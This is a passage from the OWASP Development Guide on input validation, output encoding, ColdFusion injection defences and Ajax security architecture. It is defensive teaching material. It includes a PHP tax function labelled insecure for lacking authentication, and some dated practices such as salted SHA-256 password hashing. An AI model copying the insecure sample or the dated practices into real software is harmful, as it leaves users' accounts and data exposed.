&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;1&amp;quot; /&amp;gt;Gold Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;2&amp;quot; /&amp;gt;Platinum Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach should be used for any input type that allows a value to be set: radio buttons, checkboxes, and particularly select / option lists.&lt;br /&gt;
&lt;br /&gt;
===Per-User Data ===&lt;br /&gt;
&lt;br /&gt;
In fully normalized databases, the aim is to minimize the amount of repeated data. As a result, a table may not carry all of the context needed to authorize an operation on it. For example, users can see messages that are stored in a messages table, and some messages are private to a particular user, yet the messages table itself records only the message ID and the message body, with ownership kept in another table:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
+------------------------+&lt;br /&gt;
|       MESSAGES         |&lt;br /&gt;
+------------------------+&lt;br /&gt;
|  msgid   |   message   |&lt;br /&gt;
+------------------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a user marks a message for deletion, the usual way is to recover the message ID from the user, and delete that:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE msgid='frmMsgId' &lt;br /&gt;
&lt;br /&gt;
However, how do you know if the user is eligible to delete that message ID? Such tables need to be denormalized slightly to include a user ID or make it easy to perform a single query to delete the message safely. For example, by adding back an (optional) uid column, the delete is now made reasonably safe:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE uid='session.myUserID' and msgid='frmMsgId'; &lt;br /&gt;
&lt;br /&gt;
Where the data is potentially both a private resource and a public resource (for example, in the secure message service, broadcast messages are just a special type of private message), additional precautions need to be taken to prevent users from deleting public resources without authorization. This can be done using role based checks, as well as using SQL statements to discriminate by message type:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message  &lt;br /&gt;
 WHERE&lt;br /&gt;
 uid='session.myUserID' AND&lt;br /&gt;
 msgid='frmMsgId' AND&lt;br /&gt;
 broadcastFlag = false;&lt;br /&gt;
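In JDBC, the ownership-scoped delete above might look like this (a sketch: the table and column names follow the example, and the DAO class is hypothetical):&lt;br /&gt;

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public class MessageDao {
    // The user id is bound from the session, never from the form.
    public static final String SQL =
        "DELETE FROM message WHERE uid = ? AND msgid = ? AND broadcastFlag = false";

    /** Returns the number of rows deleted; 0 means the message did not
        belong to this user (or was a broadcast), so nothing happened. */
    public static int deleteOwnMessage(Connection conn, long sessionUserId, long msgId)
            throws SQLException {
        try (PreparedStatement st = conn.prepareStatement(SQL)) {
            st.setLong(1, sessionUserId);
            st.setLong(2, msgId);
            return st.executeUpdate();
        }
    }
}
```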
&lt;br /&gt;
==URL encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent via the URL, which is strongly discouraged, should be URL encoded and decoded. This reduces the likelihood that cross-site scripting attacks will work.&lt;br /&gt;
&lt;br /&gt;
In general, do not send data via GET requests except for navigational purposes.&lt;br /&gt;
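For example, with the standard java.net classes (a sketch; the Charset overload shown here requires Java 10 or later, well after this guide was written):&lt;br /&gt;

```java
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

public class UrlParam {
    /** Encode a value before placing it in a URL, so that delimiters
        and markup characters cannot change the request's meaning. */
    public static String encode(String value) {
        return URLEncoder.encode(value, StandardCharsets.UTF_8);
    }

    /** Decode exactly once on receipt, then validate the result. */
    public static String decode(String value) {
        return URLDecoder.decode(value, StandardCharsets.UTF_8);
    }
}
```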
&lt;br /&gt;
==HTML encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent to the user needs to be safe for the user to view. This can be done using &amp;lt;bean:write ...&amp;gt; and friends. Do not use &amp;lt;%=var%&amp;gt; unless it is used to supply an argument for &amp;lt;bean:write...&amp;gt; or similar. &lt;br /&gt;
&lt;br /&gt;
HTML encoding translates a range of characters into their HTML entities. For example, &gt; becomes &amp;amp;amp;gt;. This will still display as &gt; in the user's browser, but it is a safe alternative.&lt;br /&gt;
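Where a framework tag such as bean:write is not available, the translation can be done by hand. A minimal sketch covering the characters with special meaning in HTML (the class name is illustrative):&lt;br /&gt;

```java
public class HtmlEncoder {
    /** Translate the characters with special meaning in HTML into entities. */
    public static String encode(String input) {
        StringBuilder out = new StringBuilder(input.length());
        for (char c : input.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```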
&lt;br /&gt;
==Encoded strings ==&lt;br /&gt;
&lt;br /&gt;
Some strings may be received in encoded form. It is essential to send the correct locale to the user so that the web server and application server can provide a single level of canonicalization prior to the first use. &lt;br /&gt;
&lt;br /&gt;
Do not use getReader() or getInputStream(), as these input methods do not decode encoded strings. If you need to use these constructs, you must canonicalize the data by hand. &lt;br /&gt;
&lt;br /&gt;
==Data Validation and Interpreter Injection ==&lt;br /&gt;
&lt;br /&gt;
This section focuses on preventing injection in ColdFusion. Interpreter Injection involves manipulating application parameters to execute malicious code on the system. The most prevalent of these is SQL injection, but the category also includes other injection techniques, including LDAP, ORM, User Agent, XML, etc. – see the [[Reviewing_Code_for_OS_Injection|Interpreter Injection]] chapter of this document for greater detail. As a developer, you should assume that all input is malicious. Before processing any input coming from a user, data source, component, or data service, it should be validated for type, length, and/or range. ColdFusion includes support for Regular Expressions and CFML tags that can be used to validate input.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&lt;br /&gt;
&lt;br /&gt;
[[SQL Injection]] involves sending extraneous SQL queries as variables. ColdFusion provides the &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; tags for validating database parameters. These tags nest inside &amp;lt;cfquery&amp;gt; and &amp;lt;cfstoredproc&amp;gt;, respectively. For dynamic SQL submitted in &amp;lt;cfquery&amp;gt;, use the CFSQLTYPE attribute of &amp;lt;cfqueryparam&amp;gt; to validate variables against the expected database datatype. Similarly, use the CFSQLTYPE attribute of &amp;lt;cfprocparam&amp;gt; to validate the datatypes of stored procedure parameters passed through &amp;lt;cfstoredproc&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also strengthen your systems against SQL Injection by disabling the Allowed SQL operations for individual data sources. See the '''Configuration''' section below for more information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''LDAP Injection'''&lt;br /&gt;
&lt;br /&gt;
[[LDAP injection]] is an attack used to exploit web-based applications that construct LDAP statements from user input. ColdFusion uses the &amp;lt;cfldap&amp;gt; tag to communicate with LDAP servers. This tag has an ACTION attribute which dictates the query performed against the LDAP server. The valid values for this attribute are: add, delete, query (default), modify, and modifyDN. &amp;lt;cfldap&amp;gt; calls are turned into JNDI (Java Naming and Directory Interface) lookups. However, because &amp;lt;cfldap&amp;gt; wraps the calls, it will throw syntax errors if native JNDI code is passed to its attributes, making LDAP injection more difficult.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XML Injection'''&lt;br /&gt;
&lt;br /&gt;
Two parsers exist for XML data – SAX and DOM. ColdFusion uses DOM, which reads the entire XML document into the server’s memory. This requires the administrator to restrict the size of the JVM containing ColdFusion. ColdFusion is built on Java; therefore, by default, entity references are expanded during parsing. To prevent unbounded entity expansion, filter out DOCTYPE elements before a string is converted to an XML DOM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After the DOM has been read, to reduce the risk of XML Injection use the ColdFusion XML decision functions: isXML(), isXmlAttribute(), isXmlElement(), isXmlNode(), and isXmlRoot(). The isXML() function determines if a string is well-formed XML. The other functions determine whether or not the passed parameter is a valid part of an XML document. Use the xmlValidate() function to validate external XML documents against a Document Type Definition (DTD) or XML Schema.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Event Gateway, IM, and SMS Injection'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 enables Event Gateways, instant messaging (IM), and SMS (short message service) for interacting with external systems. Event Gateways are ColdFusion components that respond asynchronously to non-HTTP requests – e.g. instant messages, SMS text from wireless devices, etc. ColdFusion provides Lotus Sametime and XMPP (Extensible Messaging and Presence Protocol) gateways for instant messaging. It also provides an event gateway for interacting with SMS text messages.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Injection along these gateways can happen when end users (and/or systems) send malicious code to execute on the server. These gateways all utilize ColdFusion Components (CFCs) for processing. Use standard ColdFusion functions, tags, and validation techniques to protect against malicious code injection. Sanitize all input strings and do not allow un-validated code to access backend systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use the XML functions to validate XML input.&lt;br /&gt;
&lt;br /&gt;
*Before performing XPath searches and transformations in ColdFusion, validate the source.&lt;br /&gt;
&lt;br /&gt;
*Use ColdFusion validation techniques to sanitize strings passed to xmlSearch for performing XPath queries. &lt;br /&gt;
&lt;br /&gt;
*When performing XML transformations only use a trusted source for the XSL stylesheet.&lt;br /&gt;
&lt;br /&gt;
*Ensure that the memory size of the Java Sandbox containing ColdFusion can handle large XML documents without adversely affecting server resources.&lt;br /&gt;
&lt;br /&gt;
*Set the memory value to less than the amount of RAM on the server (-Xmx).&lt;br /&gt;
&lt;br /&gt;
*Remove DOCTYPE elements from the XML string before converting it to an XML object.&lt;br /&gt;
&lt;br /&gt;
*Use scriptProtect to thwart most cross-site scripting attempts. Set scriptProtect to All in the Application.cfc.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfparam&amp;gt; or &amp;lt;cfargument&amp;gt; to instantiate variables in ColdFusion. Use this tag with the name and type attributes. If the value is not of the specified type, ColdFusion returns an error.&lt;br /&gt;
&lt;br /&gt;
*To handle untyped variables, use IsValid() to validate their values against any legal object type that ColdFusion supports.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; to validate dynamic SQL variables against database datatypes.&lt;br /&gt;
&lt;br /&gt;
*Use CFLDAP for accessing LDAP servers. Avoid allowing native JNDI calls to connect to LDAP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice in Action'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The sample code below shows a database authentication function using some of the input validation techniques discussed in this section.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, strUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, strPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
FROM UserTable&lt;br /&gt;
&lt;br /&gt;
WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Delimiter and special characters ==&lt;br /&gt;
&lt;br /&gt;
There are many characters that mean something special to various programs. Even if you followed the advice to accept only characters that are known to be good, it is still likely that a few delimiters will catch you out. &lt;br /&gt;
&lt;br /&gt;
Here are the usual suspects:&lt;br /&gt;
&lt;br /&gt;
* NULL (zero) %00&lt;br /&gt;
&lt;br /&gt;
* LF - ANSI chr(10) &amp;quot;\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - ANSI chr(13) &amp;quot;\r&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CRLF - &amp;quot;\r\n&amp;quot;&lt;br /&gt;
&lt;br /&gt;
* CR - EBCDIC 0x0d &lt;br /&gt;
&lt;br /&gt;
* Quotes &amp;quot; '&lt;br /&gt;
&lt;br /&gt;
* Commas, slashes, spaces, tabs, and other white space - used in CSV, tab-delimited output, and other specialist formats&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;&amp;gt; - XML and HTML tag markers, redirection characters&lt;br /&gt;
&lt;br /&gt;
* ; &amp;amp; - command separators on Unix and NT&lt;br /&gt;
&lt;br /&gt;
* @ - used for e-mail addresses&lt;br /&gt;
&lt;br /&gt;
* 0xff&lt;br /&gt;
&lt;br /&gt;
* ... more&lt;br /&gt;
&lt;br /&gt;
Whenever you code to a particular technology, you should determine which characters are &amp;quot;special&amp;quot; to it, and either prevent them from appearing in input or properly escape them.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ASP.NET 2.0 Viewstate&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://channel9.msdn.com/wiki/default.aspx/Channel9.HowToConfigureTheMachineKeyInASPNET2&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Validation]]&lt;br /&gt;
[[Category:Encoding]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59647</id>
		<title>Ajax and Other &quot;Rich&quot; Interface Technologies</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Ajax_and_Other_%22Rich%22_Interface_Technologies&amp;diff=59647"/>
				<updated>2009-04-29T12:30:16Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control: Authentication and Authorization */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
'''''Style is time’s fool. Form is time’s student – Stewart Brand '''''&lt;br /&gt;
&lt;br /&gt;
Ajax applications, often styled as “Web 2.0”, are not a form of magic security pixie dust. Instead, there are two classes of applications: secure and insecure. This is independent of the use of Ajax or similar technologies that preceded it, such as Flash, applets, or ActiveX. With some effort, Ajax applications can be secure. Unfortunately, many are not, which is the '''''raison d’être''''' of this chapter.&lt;br /&gt;
&lt;br /&gt;
The acronym AJAX stands for Asynchronous JavaScript and XML. The technologies underpinning Ajax are not new – they first appeared in 1998 with Microsoft Outlook Web Access in Exchange Server 5.5. “Web 2.0” was defined by Tim O’Reilly to mean highly peer-to-peer dynamic applications. Such applications include del.icio.us, which allows users to share their bookmark libraries, or Flickr, which allows users to share their photos in a highly interactive way. We define “Ajax applications” as those that use the XMLHttpRequest object to asynchronously call the server and receive replies, regardless of how they handle or display the received data, and regardless of whether they are public, low-value peer-to-peer applications such as forum software, or handle highly sensitive private data, such as a tax return lodgment application.&lt;br /&gt;
&lt;br /&gt;
Ajax enabled applications aim to increase the interactivity and richness of the web interface. Secure Ajax applications are achievable at minimal cost increase as long as security is considered during design and tested throughout development. &lt;br /&gt;
&lt;br /&gt;
Compliance with disability laws is mandatory for all government and most corporate organizations. Ajax framework developers who wish their frameworks to be adopted by such organizations must ensure their code supports common accessibility aids. Ajax framework users should select frameworks that produce accessible output, design their applications to be accessible, and test regularly. In most countries, to do otherwise is simply deliberate negligence, and is often harshly punished by the courts. &lt;br /&gt;
&lt;br /&gt;
Ajax applications face '''''exactly the same '''''security issues as all other web applications, plus they add their own particular set of risks that must be correctly managed. By their complex, bidirectional, and asynchronous nature, Ajax applications increase attack surface area. &lt;br /&gt;
&lt;br /&gt;
Use of Ajax (or any rich interface) requires careful consideration of architecture, server-side access control, state management, and strong validation to prevent attacks. Without considering these basic controls, even brochure-ware websites, such as car manufacturer websites, can be a hazard to both the user and the web site owner’s reputation and thus sales.&lt;br /&gt;
&lt;br /&gt;
At the time of writing, there is a multitude of Ajax frameworks and add-ons, with many more being written every day. Users of Ajax frameworks should ensure that their chosen framework addresses the security risks of their particular application, and does not impose an unsecurable architecture upon them. &lt;br /&gt;
&lt;br /&gt;
Developers of Ajax frameworks should investigate the controls presented in this chapter, and associated controls documented throughout the rest of this book to ensure that their approach is simple, accessible, and secure.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that applications using AJAX (and all “rich” interactive interfaces, such as Flash and Shockwave) have adequate:&lt;br /&gt;
&lt;br /&gt;
* Secure Communications&lt;br /&gt;
&lt;br /&gt;
* Authentication and Session Management&lt;br /&gt;
&lt;br /&gt;
* Access Control &lt;br /&gt;
&lt;br /&gt;
* Input Validation&lt;br /&gt;
&lt;br /&gt;
* Error Handling and Logging&lt;br /&gt;
&lt;br /&gt;
To prevent applications from being attacked using known attack vectors, such as unauthorized access, injection attacks, and so on.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
* All Server Platforms&lt;br /&gt;
&lt;br /&gt;
* Web applications which use Ajax, ActiveX, Flash or Shockwave&lt;br /&gt;
&lt;br /&gt;
* Clients which are required to use such applications&lt;br /&gt;
&lt;br /&gt;
==Architecture ==&lt;br /&gt;
&lt;br /&gt;
Appropriate security architecture should be considered when implementing Ajax front ends. Some Ajax frameworks, such as Tibco and Atlas (an Ajax framework for .NET), proudly advertise that they are 100% client based, with no server-side controls. &lt;br /&gt;
&lt;br /&gt;
Strong security architecture provides adequate defense in depth, and architecturally correct placement of key security controls. For more details, see the Security Architecture chapter.&lt;br /&gt;
[[Category:FIXME|I wanted to make Security Architecture a link, but I am not sure what section it refers to]]&lt;br /&gt;
&lt;br /&gt;
For some types of applications, such as brochure-ware and non-interactive applications such as stock tickers, this is acceptable security architecture, as the risks are low – it would be hard to bypass the security controls to lose actual money. However, as the risk of the application increases, the threats and countermeasures required also increase. &lt;br /&gt;
&lt;br /&gt;
'''Architecture by example '''&lt;br /&gt;
&lt;br /&gt;
For the purposes of this section, irs.gov.ex, a taxation department of a fictitious country, has decided to implement an Ajax enabled electronic lodgment and tracking service for all of its 100 million taxpayers. A key reason to move to the new system is to reduce the workload on existing staff for the 90+% of tax returns that could be processed automatically … as long as the taxpayers do not deliberately lie, deceive, or cheat the system. Which of course, they do regularly. &lt;br /&gt;
&lt;br /&gt;
They bought a fancy new Enterprise Service Bus (ESB), to which they hooked up their old but incredibly reliable mainframe backend, their SAP R/3 implementation that writes the checks and tax invoices, and several other key systems. &lt;br /&gt;
&lt;br /&gt;
This particular ESB, like many on the market today, has no data validation, authentication, or authorization controls of its own; it is a simple web-service integration layer. The ESB expects that the underlying systems will perform adequate validation and authorization to prevent abuse, as the software company that wrote the ESB expected that all calling systems would be trusted, internal systems. Hooking up a dynamic web site where the users are known to be relentless, eager, and motivated tax avoiders changes the risk profile of a previously internal system with trusted staff.&lt;br /&gt;
&lt;br /&gt;
The tax department does not want to change existing systems as they are in production and stable. More to the point, they cannot change their mainframe code easily - their skilled mainframe programmers either were promoted to senior management or retired 15 years ago, and it would be extremely costly to hire new mainframe developers, and impossible to change how the third party systems work, like SAP or their anti-fraud system. &lt;br /&gt;
&lt;br /&gt;
Old code, such as COBOL CICS transactions, or previously internal only systems such as SAP R/3, have a different trust model than highly dynamic Internet connected websites. It is highly likely such systems have never been tested against now common attacks, such as HTML injection (XSS), DOM injection, XML query attacks, or similar. Without any intermediate code to protect these older systems, they are at immense risk.&lt;br /&gt;
&lt;br /&gt;
The tax department selected a simple solution in the belief it will save money. In this first example, the bulk of the business logic is contained in deployed JavaScript applications. All of the business logic, validation, and state are contained in the client’s browser, and it makes direct calls to the enterprise service bus. &lt;br /&gt;
&lt;br /&gt;
However, this model is simply broken: the previously generic process orchestration service will need to become far more aware of the caller’s identity (to provide authentication and enforce authorization), maintain secure state, and provide validation services that have previously been performed on the client. &lt;br /&gt;
&lt;br /&gt;
[[Image:Insecure Security and state maintained on the client.gif]]&lt;br /&gt;
&lt;br /&gt;
This security model is akin to leaving the keys to the Reserve Bank at the train station notice board. There is no method of protecting this model without significant replication of the business logic and re-validating all the state at the enterprise service bus, or similar web service endpoints. &lt;br /&gt;
&lt;br /&gt;
Many enterprises, including irs.gov.ex, have taken to service oriented architecture (SOA), which uses web services enabling re-use of pre-existing transactions and systems, such as SAP or Siebel, or custom transactions running on mainframes. If an Ajax framework is connected to such SOA endpoints, such as an enterprise service bus, or directly to a backend data warehouse or other persistent store, there is no ability to validate the calling identity, authorize the transaction, validate the data, or any other normal security activity. So this model will not do. &lt;br /&gt;
&lt;br /&gt;
In the next model, which is how most PHP application frameworks work today, the Ajax xmlrpc endpoint is not necessarily well integrated with the main application. &lt;br /&gt;
&lt;br /&gt;
[[Image: Insecure Ajax Web Service Endpoint separate from the main application.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, if the Ajax endpoint cannot or does not access secure state, or associate the call with the active session, a hostile caller could emulate an active session and call protected resources with minimal skills or tools. This vulnerability has already been demonstrated with several popular Ajax PHP toolkits on Bugtraq, and probably applies to other less well-known toolkits for other languages and platforms.&lt;br /&gt;
&lt;br /&gt;
The best way to protect both of these models is to bring them back to the normal three-tier application model:&lt;br /&gt;
&lt;br /&gt;
[[Image: Better Shared business logic in the middle tier with different front ends.gif]]&lt;br /&gt;
&lt;br /&gt;
In this model, which is akin to how GMail works, the application is still significantly Ajax enabled, and provides a rich experience to the user. However, this code is backed by:&lt;br /&gt;
&lt;br /&gt;
* A solid session management scheme ensuring that authentication and authorization are performed in a trusted part of the architecture&lt;br /&gt;
&lt;br /&gt;
* Data validation performed in both directions on the server side at various layers to limit or prevent injection and other attacks&lt;br /&gt;
&lt;br /&gt;
* All calls to the backend services being performed by trusted server-side business logic&lt;br /&gt;
&lt;br /&gt;
* A layered architecture allowing reasonable trust of the caller at the ESB level, as the data has already been authorized and validated&lt;br /&gt;
&lt;br /&gt;
This means that the ESB and its published services, such as 40 year old COBOL code, do not need to be particularly aware of the implications of being made available to the Internet. This enables higher levels of re-use and reduces costs.&lt;br /&gt;
&lt;br /&gt;
Although this architecture is more complex for the project implementing the Ajax enabled application, to the funding business it is the cheapest way of maintaining security whilst avoiding updating or maintaining ancient or third-party code.&lt;br /&gt;
&lt;br /&gt;
Selecting the correct architecture is unfortunately not a checklist – it is a balance of risk versus cost. However, as demonstrated in this section, client-side heavy architecture models are completely untrustworthy for transactional systems and should be avoided.&lt;br /&gt;
&lt;br /&gt;
==Access control: Authentication and Authorization ==&lt;br /&gt;
[[Category:FIXME|Starting here, should these sections be part of this article? Or do they go somewhere else with links here?]]&lt;br /&gt;
&lt;br /&gt;
Ajax code uses the XMLHttpRequest object, which will send the cookies of the current browser context through with each request. For applications which have user sessions, it is vital that normal authentication paths are used to ensure that the caller is known to the application. Brochure-ware applications can skip this section as they allow anonymous calling.&lt;br /&gt;
&lt;br /&gt;
'''How to determine if you are vulnerable '''&lt;br /&gt;
&lt;br /&gt;
If you have transactions or calls that are not to be used by anonymous callers, check that client-side code cannot call them without an established user context.&lt;br /&gt;
&lt;br /&gt;
To do this: &lt;br /&gt;
&lt;br /&gt;
* Fire up your favorite proxy tool, such as WebScarab&lt;br /&gt;
&lt;br /&gt;
* Generate an authenticated XMLHttpRequest using the browser&lt;br /&gt;
&lt;br /&gt;
* Right click on the resulting entry in WebScarab, click “Re-send” &lt;br /&gt;
&lt;br /&gt;
* Edit out the cookie&lt;br /&gt;
&lt;br /&gt;
See if a valid result is returned. If yes, you are vulnerable. Repeat for every Ajax enabled server-side service.&lt;br /&gt;
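&lt;br /&gt;
These steps can be scripted. The sketch below, in Node-style JavaScript, is a hedged illustration – the function names are invented for this example and are not part of WebScarab or any real tool. It shows the core logic only: strip the Cookie header from a captured request, replay it, and treat any 2xx answer as a failure to verify the session.&lt;br /&gt;
&lt;br /&gt;
```javascript
// Illustrative sketch: replay a captured Ajax request without its
// session cookie and classify the result.

// Remove the Cookie header from a captured request's header set.
function stripCookie(headers) {
  const copy = {};
  for (const name of Object.keys(headers)) {
    if (name.toLowerCase() !== 'cookie') copy[name] = headers[name];
  }
  return copy;
}

// A 2xx reply to the cookie-less replay means the endpoint answered
// without a session: vulnerable. 401, 403, or a redirect to the login
// page suggests the session is being verified.
function classifyReplay(statusCode) {
  if (Math.floor(statusCode / 100) === 2) return 'vulnerable';
  return 'session appears to be verified';
}
```
&lt;br /&gt;
The replay itself would be performed with your proxy tool or an HTTP client of your choice; only the classification logic is shown here.&lt;br /&gt;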
&lt;br /&gt;
'''Countermeasures '''&lt;br /&gt;
&lt;br /&gt;
Ensure that every Ajax callable function, whether XMLRPC, custom code, or a web service, verifies the session and authorization. &lt;br /&gt;
&lt;br /&gt;
For example, in typical Ajax style, CPaint uses this insecure example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
{&lt;br /&gt;
    return $sales_amount * 0.075;&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Let’s add session authentication, role authorization, data validation, and business rule validation: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
function calculate_tax($sales_amount)&lt;br /&gt;
{&lt;br /&gt;
    // check that the session is logged in&lt;br /&gt;
    assert_login();&lt;br /&gt;
&lt;br /&gt;
    // check that the user has the USER role to prevent&lt;br /&gt;
    // guest and admin access&lt;br /&gt;
    assert_role('USER');&lt;br /&gt;
&lt;br /&gt;
    // Validate data and business rules&lt;br /&gt;
    if ( is_numeric($sales_amount) &amp;amp;&amp;amp; $sales_amount &amp;gt; 0 )&lt;br /&gt;
    {&lt;br /&gt;
        // Perform the calculation and return&lt;br /&gt;
        return $sales_amount * 0.075;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    // Data failed validation and business rules&lt;br /&gt;
    return -1;&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With these simple changes, we ensure that:&lt;br /&gt;
&lt;br /&gt;
* (Authentication) The user is logged on&lt;br /&gt;
&lt;br /&gt;
* (Authorization and Compliance) The user holds the required role, which also provides SOX-compliant segregation of duties&lt;br /&gt;
&lt;br /&gt;
* (Data Validation) The data is safe to use in our calculation&lt;br /&gt;
&lt;br /&gt;
* (Business Rule Validation) The data is within acceptable business rule boundaries, as it makes no sense to calculate tax for negative or zero values&lt;br /&gt;
&lt;br /&gt;
Obviously, performing a tax rate calculation is not that important, but if this were an insurance premium calculator (which uses highly sensitive actuarial data), this is the minimum you would expect to see for sensitive code.&lt;br /&gt;
&lt;br /&gt;
==Silent transactional authorization ==&lt;br /&gt;
&lt;br /&gt;
